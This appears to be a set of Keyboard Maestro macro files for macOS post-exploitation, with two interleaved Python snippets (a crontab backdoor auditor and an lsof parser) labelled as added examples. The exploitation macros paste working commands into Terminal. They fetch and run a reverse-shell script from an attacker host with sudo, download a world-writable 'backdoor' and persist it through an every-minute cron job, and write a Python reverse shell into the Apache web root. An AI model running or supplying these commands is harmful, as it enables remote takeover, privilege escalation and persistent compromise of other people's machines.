63 | SimulateKeystroke
64 | Modifiers
65 | 0
66 | ReleaseAll
67 |
68 | TargetApplication
69 |
70 | TargetingType
71 | Front
72 |
73 |
74 | CreationDate
75 | 603139824.59357095
76 | CustomIconData
77 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
78 | ModificationDate
79 | 603480219.14996004
80 | Name
81 | Root escalation sudo exploit
82 | Triggers
83 |
84 |
85 | MacroTriggerType
86 | StatusMenu
87 |
88 |
89 | UID
90 | 53134B9F-C39A-40D1-BF36-885285CA4A23
91 |
92 |
93 | Name
94 | Exploitation
95 | Targeting
96 |
97 | Targeting
98 | Included
99 | TargetingApps
100 |
101 |
102 | BundleIdentifier
103 | com.apple.Terminal
104 | Name
105 | Terminal
106 | NewFile
107 | /System/Applications/Utilities/Terminal.app
108 |
109 |
110 | BundleIdentifier
111 | com.googlecode.iterm2
112 | Name
113 | iTerm
114 | NewFile
115 | /Applications/iTerm.app
116 |
117 |
118 |
119 | ToggleMacroUID
120 | D5870CCD-9771-400D-B8C1-A5545B6FC5B2
121 | UID
122 | 6975EF66-2973-4E9B-88F8-66A69EEB3E1D
123 |
124 |
125 | Activate
126 | Normal
127 | CreationDate
128 | 603140665.49842894
129 | CustomIconData
130 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
131 | Macros
132 |
133 |
134 | Actions
135 |
136 |
137 | Buttons
138 |
139 |
140 | Button
141 | OK
142 |
143 |
144 | Button
145 | Cancel
146 | Cancel
147 |
148 |
149 |
150 | MacroActionType
151 | PromptForUserInput
152 | Prompt
153 | Please enter your local IP and the remote password
154 | TimeOutAbortsMacro
155 |
156 | Title
157 | Information
158 | Variables
159 |
160 |
161 | Default
162 | %Variable%LHOST%
163 | Variable
164 | LHOST
165 |
166 |
167 | Default
168 |
169 | Variable
170 | PASSWORD
171 |
172 |
173 |
174 |
175 | Action
176 | ByPasting
177 | MacroActionType
178 | InsertText
179 | Text
180 | cd /tmp/ && curl http://%Variable%LHOST%/reverse_tcp.py > python.py && echo %Variable%PASSWORD% | sudo -S python python.py
181 |
182 |
183 | IsDisclosed
184 |
185 | KeyCode
186 | 36
187 | MacroActionType
188 | SimulateKeystroke
189 | Modifiers
190 | 0
191 | ReleaseAll
192 |
193 | TargetApplication
194 |
195 | TargetingType
196 | Front
197 |
198 |
199 | CreationDate
200 | 603139824.59357095
201 | CustomIconData
202 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
203 | ModificationDate
204 | 603480203.42079794
205 | Name
206 | Root escalation from password
207 | Triggers
208 |
209 |
210 | MacroTriggerType
211 | StatusMenu
212 |
213 |
214 | UID
215 | 059ACF71-78DD-4479-8568-98F88AF68FE6
216 |
217 |
218 | Name
219 | Exploitation
220 | Targeting
221 |
222 | Targeting
223 | Included
224 | TargetingApps
225 |
226 |
227 | BundleIdentifier
228 | com.apple.Terminal
229 | Name
230 | Terminal
231 | NewFile
232 | /System/Applications/Utilities/Terminal.app
233 |
234 |
235 | BundleIdentifier
236 | com.googlecode.iterm2
237 | Name
238 | iTerm
239 | NewFile
240 | /Applications/iTerm.app
241 |
242 |
243 |
244 | ToggleMacroUID
245 | D5870CCD-9771-400D-B8C1-A5545B6FC5B2
246 | UID
247 | 6975EF66-2973-4E9B-88F8-66A69EEB3E1D
248 |
249 |
250 | Activate
251 | Normal
252 | CreationDate
253 | 603140665.49842894
254 | CustomIconData
255 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
256 | Macros
257 |
258 |
259 | Actions
260 |
261 |
262 | Action
263 | ByPasting
264 | MacroActionType
265 | InsertText
266 | Text
267 | cp ~/.bash_profile.old ~/.bash_profile && rm ~/.bash_profile.old
268 |
269 |
270 | IsDisclosed
271 |
272 | KeyCode
273 | 36
274 | MacroActionType
275 | SimulateKeystroke
276 | Modifiers
277 | 0
278 | ReleaseAll
279 |
280 | TargetApplication
281 |
282 | TargetingType
283 | Front
284 |
285 |
286 | CreationDate
287 | 603139824.59357095
288 | CustomIconData
289 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
290 | ModificationDate
291 | 603257897.47791803
292 | Name
293 | Remove sudo exploit
294 | Triggers
295 |
296 |
297 | MacroTriggerType
298 | StatusMenu
299 |
300 |
301 | UID
302 | 992DBEAE-F388-4EDF-B1DD-80ABDB64CF9D
303 |
304 |
305 | Name
306 | Exploitation
307 | Targeting
308 |
309 | Targeting
310 | Included
311 | TargetingApps
312 |
313 |
314 | BundleIdentifier
315 | com.apple.Terminal
316 | Name
317 | Terminal
318 | NewFile
319 | /System/Applications/Utilities/Terminal.app
320 |
321 |
322 | BundleIdentifier
323 | com.googlecode.iterm2
324 | Name
325 | iTerm
326 | NewFile
327 | /Applications/iTerm.app
328 |
329 |
330 |
331 | ToggleMacroUID
332 | D5870CCD-9771-400D-B8C1-A5545B6FC5B2
333 | UID
334 | 6975EF66-2973-4E9B-88F8-66A69EEB3E1D
335 |
336 |
337 | Activate
338 | Normal
339 | CreationDate
340 | 603140665.49842894
341 | CustomIconData
342 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
343 | Macros
344 |
345 |
346 | Actions
347 |
348 |
349 | Action
350 | ByPasting
351 | MacroActionType
352 | InsertText
353 | Text
354 | rm /users/shared/db
355 |
356 |
357 | IsDisclosed
358 |
359 | KeyCode
360 | 36
361 | MacroActionType
362 | SimulateKeystroke
363 | Modifiers
364 | 0
365 | ReleaseAll
366 |
367 | TargetApplication
368 |
369 | TargetingType
370 | Front
371 |
372 |
373 | MacroActionType
374 | Pause
375 | Time
376 | 0.5
377 | TimeOutAbortsMacro
378 |
379 |
380 |
381 | Action
382 | ByPasting
383 | MacroActionType
384 | InsertText
385 | Text
386 | echo "" > cron; crontab cron && rm cron
387 |
388 |
389 | IsDisclosed
390 |
391 | KeyCode
392 | 36
393 | MacroActionType
394 | SimulateKeystroke
395 | Modifiers
396 | 0
397 | ReleaseAll
398 |
399 | TargetApplication
400 |
401 | TargetingType
402 | Front
403 |
404 |
405 | CreationDate
406 | 603158737.91990697
407 | CustomIconData
408 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
409 | ModificationDate
410 | 604396901.01719797
411 | Name
412 | Remove backdoor (user)
413 | Triggers
414 |
415 |
416 | MacroTriggerType
417 | StatusMenu
418 |
419 |
420 | UID
421 | 738A2B44-19A4-4A68-B35D-847EAD42CFFD
422 |
423 |
424 | Name
425 | Exploitation
426 | Targeting
427 |
428 | Targeting
429 | Included
430 | TargetingApps
431 |
432 |
433 | BundleIdentifier
434 | com.apple.Terminal
435 | Name
436 | Terminal
437 | NewFile
438 | /System/Applications/Utilities/Terminal.app
439 |
440 |
441 | BundleIdentifier
442 | com.googlecode.iterm2
443 | Name
444 | iTerm
445 | NewFile
446 | /Applications/iTerm.app
447 |
448 |
449 |
450 | ToggleMacroUID
451 | D5870CCD-9771-400D-B8C1-A5545B6FC5B2
452 | UID
453 | 6975EF66-2973-4E9B-88F8-66A69EEB3E1D
454 |
455 |
456 | Activate
457 | Normal
458 | CreationDate
459 | 603140665.49842894
460 | CustomIconData
461 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
462 | Macros
463 |
464 |
465 | Actions
466 |
467 |
468 | Action
469 | ByPasting
470 | MacroActionType
471 | InsertText
472 | Text
473 | ls /etc/ | grep db
474 |
475 |
476 | IsDisclosed
477 |
478 | KeyCode
479 | 36
480 | MacroActionType
481 | SimulateKeystroke
482 | Modifiers
483 | 0
484 | ReleaseAll
485 |
486 | TargetApplication
487 |
488 | TargetingType
489 | Front
490 |
491 |
492 | MacroActionType
493 | Pause
494 | Time
495 | 1
496 | TimeOutAbortsMacro
497 |
498 |
499 |
500 | Action
501 | ByPasting
502 | MacroActionType
503 | InsertText
504 | Text
505 | ls /users/shared/ | grep db
506 |
507 |
508 | IsDisclosed
509 |
510 | KeyCode
511 | 36
512 | MacroActionType
513 | SimulateKeystroke
514 | Modifiers
515 | 0
516 | ReleaseAll
517 |
518 | TargetApplication
519 |
520 | TargetingType
521 | Front
522 |
523 |
524 | MacroActionType
525 | Pause
526 | Time
527 | 1
528 | TimeOutAbortsMacro
529 |
530 |
531 |
532 | Action
533 | ByPasting
534 | MacroActionType
535 | InsertText
536 | Text
537 | env EDITOR=nano crontab -l
538 |
539 |
540 | IsDisclosed
541 |
542 | KeyCode
543 | 36
544 | MacroActionType
545 | SimulateKeystroke
546 | Modifiers
547 | 0
548 | ReleaseAll
549 |
550 | TargetApplication
551 |
552 | TargetingType
553 | Front
554 |
555 |
556 | CreationDate
557 | 603158737.91990697
558 | CustomIconData
559 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
560 | ModificationDate
561 | 604378250.17346704
562 | Name
563 | Check backdoor
564 | Triggers
565 |
566 |
567 | MacroTriggerType
568 | StatusMenu
569 |
570 |
571 | UID
572 | 643C1B7F-5788-4FA5-B23B-D42378C2E366
573 |
574 |
575 | Name
576 | Exploitation
577 | Targeting
578 |
579 | Targeting
580 | Included
581 | TargetingApps
582 |
583 |
584 | BundleIdentifier
585 | com.apple.Terminal
586 | Name
587 | Terminal
588 | NewFile
589 | /System/Applications/Utilities/Terminal.app
590 |
591 |
592 | BundleIdentifier
593 | com.googlecode.iterm2
594 | Name
595 | iTerm
596 | NewFile
597 | /Applications/iTerm.app
598 |
599 |
600 |
601 | ToggleMacroUID
602 | D5870CCD-9771-400D-B8C1-A5545B6FC5B2
603 | UID
604 | 6975EF66-2973-4E9B-88F8-66A69EEB3E1D
605 |
606 |
607 | Activate
608 | Normal
609 | CreationDate
610 | 603140665.49842894
611 | CustomIconData
612 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
613 | Macros
614 |
615 |
616 | Actions
617 |
618 |
619 | Buttons
620 |
621 |
622 | Button
623 | OK
624 |
625 |
626 | Button
627 | Cancel
628 | Cancel
629 |
630 |
631 |
632 | MacroActionType
633 | PromptForUserInput
634 | Prompt
635 | Please enter your local IP (the web server that serves /backdoor over HTTP).
636 | TimeOutAbortsMacro
637 |
638 | Title
639 | Information
640 | Variables
641 |
642 |
643 | Default
644 | %Variable%LHOST%
645 | Variable
646 | LHOST
647 |
648 |
649 |
650 |
651 | Action
652 | ByPasting
653 | MacroActionType
654 | InsertText
655 | Text
656 | curl http://%Variable%LHOST%/backdoor > /users/shared/db; chmod 777 /users/shared/db
657 |
658 |
659 | IsDisclosed
660 |
661 | KeyCode
662 | 36
663 | MacroActionType
664 | SimulateKeystroke
665 | Modifiers
666 | 0
667 | ReleaseAll
668 |
669 | TargetApplication
670 |
671 | TargetingType
672 | Front
673 |
674 |
675 | MacroActionType
676 | Pause
677 | Time
678 | 0.5
679 | TimeOutAbortsMacro
680 |
681 |
682 |
683 | Action
684 | ByPasting
685 | MacroActionType
686 | InsertText
687 | Text
688 | echo "* * * * * /users/shared/db" > /tmp/cron; crontab /tmp/cron; rm /tmp/cron
689 |
690 |
691 | IsDisclosed
692 |
693 | KeyCode
694 | 36
695 | MacroActionType
696 | SimulateKeystroke
697 | Modifiers
698 | 0
699 | ReleaseAll
700 |
701 | TargetApplication
702 |
703 | TargetingType
704 | Front
705 |
706 |
707 | CreationDate
708 | 603158737.91990697
709 | CustomIconData
710 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
711 | ModificationDate
712 | 604396259.66541398
713 | Name
714 | Install backdoor (user)
715 | Triggers
716 |
717 |
718 | MacroTriggerType
719 | StatusMenu
720 |
721 |
722 | UID
723 | 5A610A68-1124-48A8-A6E6-31CD4B1919AF
724 |
725 |
726 | Name
727 | Exploitation
728 | Targeting
729 |
730 | Targeting
731 | Included
732 | TargetingApps
733 |
734 |
735 | BundleIdentifier
736 | com.apple.Terminal
737 | Name
738 | Terminal
739 | NewFile
740 | /System/Applications/Utilities/Terminal.app
741 |
742 |
743 | BundleIdentifier
744 | com.googlecode.iterm2
745 | Name
746 | iTerm
747 | NewFile
748 | /Applications/iTerm.app
749 |
750 |
751 |
752 | ToggleMacroUID
753 | D5870CCD-9771-400D-B8C1-A5545B6FC5B2
754 | UID
755 | 6975EF66-2973-4E9B-88F8-66A69EEB3E1D
756 |
757 |
758 | Activate
759 | Normal
760 | CreationDate
761 | 603140665.49842894
762 | CustomIconData
763 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
764 | Macros
765 |
766 |
767 | Actions
768 |
769 |
770 | Buttons
771 |
772 |
773 | Button
774 | OK
775 |
776 |
777 | Button
778 | Cancel
779 | Cancel
780 |
781 |
782 |
783 | MacroActionType
784 | PromptForUserInput
785 | Prompt
786 | Please enter your local IP
787 | TimeOutAbortsMacro
788 |
789 | Title
790 | Information
791 | Variables
792 |
793 |
794 | Default
795 | %Variable%LHOST%
796 | Variable
797 | LHOST
798 |
799 |
800 |
801 |
802 | Action
803 | ByPasting
804 | MacroActionType
805 | InsertText
806 | Text
807 | curl http://%Variable%LHOST%/backdoor > /etc/db && chmod 777 /etc/db
808 |
809 |
810 | IsDisclosed
811 |
812 | KeyCode
813 | 36
814 | MacroActionType
815 | SimulateKeystroke
816 | Modifiers
817 | 0
818 | ReleaseAll
819 |
820 | TargetApplication
821 |
822 | TargetingType
823 | Front
824 |
825 |
826 | MacroActionType
827 | Pause
828 | Time
829 | 0.5
830 | TimeOutAbortsMacro
831 |
832 |
833 |
834 | Action
835 | ByPasting
836 | MacroActionType
837 | InsertText
838 | Text
839 | echo "* * * * * /etc/db" > /tmp/cron && crontab /tmp/cron && rm /tmp/cron
840 |
841 |
842 | IsDisclosed
843 |
844 | KeyCode
845 | 36
846 | MacroActionType
847 | SimulateKeystroke
848 | Modifiers
849 | 0
850 | ReleaseAll
851 |
852 | TargetApplication
853 |
854 | TargetingType
855 | Front
856 |
857 |
858 | CreationDate
859 | 603158737.91990697
860 | CustomIconData
861 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
862 | ModificationDate
863 | 604389717.57555997
864 | Name
865 | Install backdoor (root)
866 | Triggers
867 |
868 |
869 | MacroTriggerType
870 | StatusMenu
871 |
872 |
873 | UID
874 | 6763136A-6EF7-41B6-9EC0-00D1DDE9F611
875 |
876 |
877 | Name
878 | Exploitation
879 | Targeting
880 |
881 | Targeting
882 | Included
883 | TargetingApps
884 |
885 |
886 | BundleIdentifier
887 | com.apple.Terminal
888 | Name
889 | Terminal
890 | NewFile
891 | /System/Applications/Utilities/Terminal.app
892 |
893 |
894 | BundleIdentifier
895 | com.googlecode.iterm2
896 | Name
897 | iTerm
898 | NewFile
899 | /Applications/iTerm.app
900 |
901 |
902 |
903 | ToggleMacroUID
904 | D5870CCD-9771-400D-B8C1-A5545B6FC5B2
905 | UID
906 | 6975EF66-2973-4E9B-88F8-66A69EEB3E1D
907 |
908 |
909 | Activate
910 | Normal
911 | CreationDate
912 | 603140665.49842894
913 | CustomIconData
914 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
915 | Macros
916 |
917 |
918 | Actions
919 |
920 |
921 | Buttons
922 |
923 |
924 | Button
925 | OK
926 |
927 |
928 | Button
929 | Cancel
930 | Cancel
931 |
932 |
933 |
934 | MacroActionType
935 | PromptForUserInput
936 | Prompt
937 | Fill in these variables. A Python reverse-shell payload that connects back to LHOST:LPORT is written to /tmp and then moved into the Apache document root (/Library/WebServer/Documents); the move requires root privileges (sudo).
938 | TimeOutAbortsMacro
939 |
940 | Title
941 | Create netcat payload
942 | Variables
943 |
944 |
945 | Default
946 | %Variable%LHOST%
947 | Variable
948 | LHOST
949 |
950 |
951 | Default
952 | %Variable%LPORT%
953 | Variable
954 | LPORT
955 |
956 |
957 |
958 |
959 | Action
960 | ByPasting
961 | MacroActionType
962 | InsertText
963 | Text
964 | echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%Variable%LHOST%",%Variable%LPORT%));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > /tmp/nc.py && sudo mv /tmp/nc.py /Library/WebServer/Documents/reverse_tcp.py
965 |
966 |
967 | IsDisclosed
968 |
969 | KeyCode
970 | 36
971 | MacroActionType
972 | SimulateKeystroke
973 | Modifiers
974 | 0
975 | ReleaseAll
976 |
977 | TargetApplication
978 |
979 | TargetingType
980 | Front
981 |
982 |
983 | CreationDate
984 | 603381955.08927703
985 | CustomIconData
986 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
987 | ModificationDate
988 | 604511837.59938502
989 | Name
990 | Create netcat payload (python)
991 | Triggers
992 |
993 |
994 | MacroTriggerType
995 | StatusMenu
996 |
997 |
998 | UID
999 | 2F27C92B-8EAA-4B36-8047-467326DF79A9
1000 |
1001 |
1002 | Name
1003 | Exploitation
1004 | Targeting
1005 |
1006 | Targeting
1007 | Included
1008 | TargetingApps
1009 |
1010 |
1011 | BundleIdentifier
1012 | com.apple.Terminal
1013 | Name
1014 | Terminal
1015 | NewFile
1016 | /System/Applications/Utilities/Terminal.app
1017 |
1018 |
1019 | BundleIdentifier
1020 | com.googlecode.iterm2
1021 | Name
1022 | iTerm
1023 | NewFile
1024 | /Applications/iTerm.app
1025 |
1026 |
1027 |
1028 | ToggleMacroUID
1029 | D5870CCD-9771-400D-B8C1-A5545B6FC5B2
1030 | UID
1031 | 6975EF66-2973-4E9B-88F8-66A69EEB3E1D
1032 |
1033 |
1034 | Activate
1035 | Normal
1036 | CreationDate
1037 | 603140665.49842894
1038 | CustomIconData
1039 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
1040 | Macros
1041 |
1042 |
1043 | Actions
1044 |
1045 |
1046 | Action
1047 | ByPasting
1048 | MacroActionType
1049 | InsertText
1050 | Text
1051 | rm /etc/db
1052 |
1053 |
1054 | IsDisclosed
1055 |
1056 | KeyCode
1057 | 36
1058 | MacroActionType
1059 | SimulateKeystroke
1060 | Modifiers
1061 | 0
1062 | ReleaseAll
1063 |
1064 | TargetApplication
1065 |
1066 | TargetingType
1067 | Front
1068 |
1069 |
1070 | MacroActionType
1071 | Pause
1072 | Time
1073 | 0.5
1074 | TimeOutAbortsMacro
1075 |
1076 |
1077 |
1078 | Action
1079 | ByPasting
1080 | MacroActionType
1081 | InsertText
1082 | Text
1083 | echo "" > cron && crontab cron && rm cron
1084 |
1085 |
1086 | IsDisclosed
1087 |
1088 | KeyCode
1089 | 36
1090 | MacroActionType
1091 | SimulateKeystroke
1092 | Modifiers
1093 | 0
1094 | ReleaseAll
1095 |
1096 | TargetApplication
1097 |
1098 | TargetingType
1099 | Front
1100 |
1101 |
1102 | CreationDate
1103 | 603158737.91990697
1104 | CustomIconData
1105 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
1106 | ModificationDate
1107 | 604396914.692276
1108 | Name
1109 | Remove backdoor (root)
1110 | Triggers
1111 |
1112 |
1113 | MacroTriggerType
1114 | StatusMenu
1115 |
1116 |
1117 | UID
1118 | AC3FA36A-D13D-4C85-8AA8-6441581D0EAC
1119 |
1120 |
1121 | Name
1122 | Exploitation
1123 | Targeting
1124 |
1125 | Targeting
1126 | Included
1127 | TargetingApps
1128 |
1129 |
1130 | BundleIdentifier
1131 | com.apple.Terminal
1132 | Name
1133 | Terminal
1134 | NewFile
1135 | /System/Applications/Utilities/Terminal.app
1136 |
1137 |
1138 | BundleIdentifier
1139 | com.googlecode.iterm2
1140 | Name
1141 | iTerm
1142 | NewFile
1143 | /Applications/iTerm.app
1144 |
1145 |
1146 |
1147 | ToggleMacroUID
1148 | D5870CCD-9771-400D-B8C1-A5545B6FC5B2
1149 | UID
1150 | 6975EF66-2973-4E9B-88F8-66A69EEB3E1D
1151 |
1152 |
1153 |
1154 |
--------------------------------------------------------------------------------
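The "Install backdoor", "Check backdoor" and "Remove backdoor" macros above all revolve around one persistence pattern: a user crontab entry that runs every minute and executes a world-writable file dropped into /Users/Shared or /etc. The "Check backdoor" macro only greps two directories and prints `crontab -l`; the following audit script, added here as an example and not part of the macro set, parses a crontab and flags exactly that pattern (sub-hourly schedule, executable in an unusual directory, world-writable mode). `SAMPLE_CRONTAB` and `SAMPLE_MODES` are constructed inputs; `mode_from_disk` is the live lookup used when the script is run directly.

```python
"""Added example (not part of the macro set): audit a crontab for the
persistence pattern the 'Install backdoor' macros create, i.e. a job that
runs every minute and executes a world-writable file dropped in
/Users/Shared or /etc. Sample inputs below are constructed, not captured."""
import os
import re
import stat
import subprocess
from dataclasses import dataclass, field

# Constructed stand-in for `crontab -l` output.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * /users/shared/db
*/5 * * * * /etc/db >/dev/null 2>&1
"""

# Constructed stand-in for file modes on disk (path -> st_mode bits).
SAMPLE_MODES = {
    "/usr/local/bin/backup.sh": 0o755,
    "/users/shared/db": 0o777,
    "/etc/db": 0o777,
}

# Directories where a scheduled executable deserves a second look.
SUSPICIOUS_DIRS = {"/users/shared", "/etc", "/tmp", "/var/tmp"}

# Five schedule fields followed by the command.
CRON_LINE = re.compile(r"^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+?)\s*$")


@dataclass
class Finding:
    line: str
    reasons: list = field(default_factory=list)


def parse_crontab(text):
    """Yield (raw_line, minute_field, command) for each job line,
    skipping blanks, comments and VAR=value assignments."""
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#") or re.match(r"^\s*\w+=", raw):
            continue
        m = CRON_LINE.match(raw)
        if m:
            yield raw, m.group(1), m.group(6)


def mode_from_disk(path):
    """Real lookup for live use; returns None when the path does not exist."""
    try:
        return os.stat(path).st_mode
    except OSError:
        return None


def audit_crontab(text, mode_of=mode_from_disk):
    """Return one Finding per job that matches any part of the backdoor pattern."""
    findings = []
    for raw, minute, command in parse_crontab(text):
        finding = Finding(raw)
        if minute == "*" or minute.startswith("*/"):
            finding.reasons.append("runs every minute or at a sub-hourly interval")
        exe = command.split()[0]
        directory = exe.rsplit("/", 1)[0].lower() or "/"
        if directory in SUSPICIOUS_DIRS:
            finding.reasons.append(f"executable lives in {directory}")
        mode = mode_of(exe)
        if mode is not None and mode & stat.S_IWOTH:
            finding.reasons.append("executable is world-writable")
        if finding.reasons:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    # Live use on the current user's crontab (the macros install it per user).
    out = subprocess.run(["crontab", "-l"], capture_output=True, text=True).stdout
    for f in audit_crontab(out):
        print(f.line, "->", "; ".join(f.reasons))
```

Run it as each user whose crontab you want to check; the macros above install the job into the invoking user's crontab, so a system-wide sweep has to iterate over users (or over /var/at/tabs with root).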
/ressources/macros/Information gathering Macros.kmmacros:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | Activate
7 | Normal
8 | CreationDate
9 | 603207196.43601894
10 | CustomIconData
11 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
12 | Macros
13 |
14 |
15 | Actions
16 |
17 |
18 | Buttons
19 |
20 |
21 | Button
22 | OK
23 |
24 |
25 | Button
26 | Cancel
27 | Cancel
28 |
29 |
30 |
31 | MacroActionType
32 | PromptForUserInput
33 | Prompt
34 | Enter a port number if you want to filter the results:
35 | TimeOutAbortsMacro
36 |
37 | Title
38 | Open PORTS (passive)
39 | Variables
40 |
41 |
42 | Default
43 |
44 | Variable
45 | PORT
46 |
47 |
48 |
49 |
50 | Conditions
51 |
52 | ConditionList
53 |
54 |
55 | ConditionType
56 | Variable
57 | Variable
58 | PORT
59 | VariableConditionType
60 | IsNotEmpty
61 | VariableValue
62 | value
63 |
64 |
65 | ConditionListMatch
66 | All
67 |
68 | ElseActions
69 |
70 |
71 | Action
72 | ByPasting
73 | MacroActionType
74 | InsertText
75 | Text
76 | lsof -i -P -n
77 |
78 |
79 | MacroActionType
80 | IfThenElse
81 | ThenActions
82 |
83 |
84 | Action
85 | ByPasting
86 | MacroActionType
87 | InsertText
88 | Text
89 | lsof -i -P -n | grep %Variable%PORT%
90 |
91 |
92 | TimeOutAbortsMacro
93 |
94 |
95 |
96 | IsDisclosed
97 |
98 | KeyCode
99 | 36
100 | MacroActionType
101 | SimulateKeystroke
102 | Modifiers
103 | 0
104 | ReleaseAll
105 |
106 | TargetApplication
107 |
108 | TargetingType
109 | Front
110 |
111 |
112 | CreationDate
113 | 603207220.833902
114 | CustomIconData
115 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
116 | ModificationDate
117 | 603384863.16840506
118 | Name
119 | Open PORTS (passive)
120 | Triggers
121 |
122 |
123 | MacroTriggerType
124 | StatusMenu
125 |
126 |
127 | UID
128 | 6CFC12AB-2997-490E-882D-2C92E13D8AE1
129 |
130 |
131 | Name
132 | Information gathering
133 | Targeting
134 |
135 | Targeting
136 | Included
137 | TargetingApps
138 |
139 |
140 | BundleIdentifier
141 | com.apple.Terminal
142 | Name
143 | Terminal
144 | NewFile
145 | /System/Applications/Utilities/Terminal.app
146 |
147 |
148 | BundleIdentifier
149 | com.googlecode.iterm2
150 | Name
151 | iTerm
152 | NewFile
153 | /Applications/iTerm.app
154 |
155 |
156 |
157 | ToggleMacroUID
158 | 38E2E2BB-5898-4929-A43E-8913B5596750
159 | UID
160 | EFD562F2-5884-4E9D-A278-1CB94FE88046
161 |
162 |
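The "Open PORTS (passive)" macro pipes `lsof -i -P -n` through `grep`, which also matches PIDs, device IDs and peer addresses that happen to contain the digits. The parser below, added here as an example and not part of the macro set, turns that output into structured rows and selects sockets that actually accept traffic (TCP in LISTEN, or any bound UDP socket), optionally restricted to one local port. `SAMPLE_LSOF` is constructed to mirror the column layout lsof prints with `-P -n`.

```python
"""Added example (not part of the macro set): parse `lsof -i -P -n` output
into structured rows and pick out listening sockets, optionally on one port,
instead of piping through grep. The sample output is constructed."""
import re
from dataclasses import dataclass

# Constructed sample of `lsof -i -P -n` output (column spacing as lsof prints it).
SAMPLE_LSOF = """\
COMMAND     PID           USER   FD   TYPE             DEVICE SIZE/OFF NODE NAME
launchd       1           root   10u  IPv6 0x3a5e2f1b8c0d9e00      0t0  TCP *:22 (LISTEN)
launchd       1           root   11u  IPv4 0x3a5e2f1b8c0d9f00      0t0  TCP *:22 (LISTEN)
mDNSRespo   250 _mdnsresponder    5u  IPv4 0x3a5e2f1b8c0da000      0t0  UDP *:5353
sshd        612           root    3u  IPv4 0x3a5e2f1b8c0da100      0t0  TCP 192.168.1.5:22->192.168.1.9:51234 (ESTABLISHED)
python3    4321          alice    3u  IPv4 0x3a5e2f1b8c0da200      0t0  TCP 127.0.0.1:8000 (LISTEN)
cupsd       330           root    6u  IPv6 0x3a5e2f1b8c0da300      0t0  TCP [::1]:631 (LISTEN)
"""

# COMMAND PID USER ... PROTO NAME [(STATE)]; the header fails on the numeric PID.
LSOF_LINE = re.compile(
    r"^(\S+)\s+(\d+)\s+(\S+)\s+.*?\b(TCP|UDP)\s+(\S+)(?:\s+\((\w+)\))?\s*$"
)


@dataclass(frozen=True)
class Socket:
    command: str
    pid: int
    user: str
    proto: str
    local_addr: str
    local_port: int
    state: str  # LISTEN, ESTABLISHED, ... or "" for UDP


def parse_lsof(text):
    """Turn lsof -i output into Socket rows; header and unparsable lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LSOF_LINE.match(line)
        if not m:
            continue
        command, pid, user, proto, name, state = m.groups()
        local = name.split("->", 1)[0]          # drop the peer of an established connection
        addr, _, port = local.rpartition(":")    # handles *:22, 1.2.3.4:22 and [::1]:631
        rows.append(Socket(command, int(pid), user, proto, addr, int(port), state or ""))
    return rows


def listening(rows, port=None):
    """Sockets that accept traffic: TCP in LISTEN, or any bound UDP socket."""
    return [
        r for r in rows
        if ((r.proto == "TCP" and r.state == "LISTEN") or r.proto == "UDP")
        and (port is None or r.local_port == port)
    ]
```

For live use, feed it `subprocess.run(["lsof", "-i", "-P", "-n"], capture_output=True, text=True).stdout`; without root, lsof only reports the current user's sockets, so a full inventory needs `sudo`.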
163 | Activate
164 | Normal
165 | CreationDate
166 | 603207196.43601894
167 | CustomIconData
168 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
169 | Macros
170 |
171 |
172 | Actions
173 |
174 |
175 | Action
176 | ByPasting
177 | MacroActionType
178 | InsertText
179 | Text
180 | /usr/sbin/networksetup -getwebproxy "Wi-Fi"
181 |
182 |
183 | IsDisclosed
184 |
185 | KeyCode
186 | 36
187 | MacroActionType
188 | SimulateKeystroke
189 | Modifiers
190 | 0
191 | ReleaseAll
192 |
193 | TargetApplication
194 |
195 | TargetingType
196 | Front
197 |
198 |
199 | Action
200 | ByPasting
201 | MacroActionType
202 | InsertText
203 | Text
204 | /usr/sbin/networksetup -getsecurewebproxy "Wi-Fi"
205 |
206 |
207 | IsDisclosed
208 |
209 | KeyCode
210 | 36
211 | MacroActionType
212 | SimulateKeystroke
213 | Modifiers
214 | 0
215 | ReleaseAll
216 |
217 | TargetApplication
218 |
219 | TargetingType
220 | Front
221 |
222 |
223 | CreationDate
224 | 603156967.88335896
225 | CustomIconData
226 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
227 | ModificationDate
228 | 605198315.53079796
229 | Name
230 | Proxies status
231 | Triggers
232 |
233 |
234 | MacroTriggerType
235 | StatusMenu
236 |
237 |
238 | UID
239 | 6917188F-A583-415A-AFAC-9A790308B910
240 |
241 |
242 | Name
243 | Information gathering
244 | Targeting
245 |
246 | Targeting
247 | Included
248 | TargetingApps
249 |
250 |
251 | BundleIdentifier
252 | com.apple.Terminal
253 | Name
254 | Terminal
255 | NewFile
256 | /System/Applications/Utilities/Terminal.app
257 |
258 |
259 | BundleIdentifier
260 | com.googlecode.iterm2
261 | Name
262 | iTerm
263 | NewFile
264 | /Applications/iTerm.app
265 |
266 |
267 |
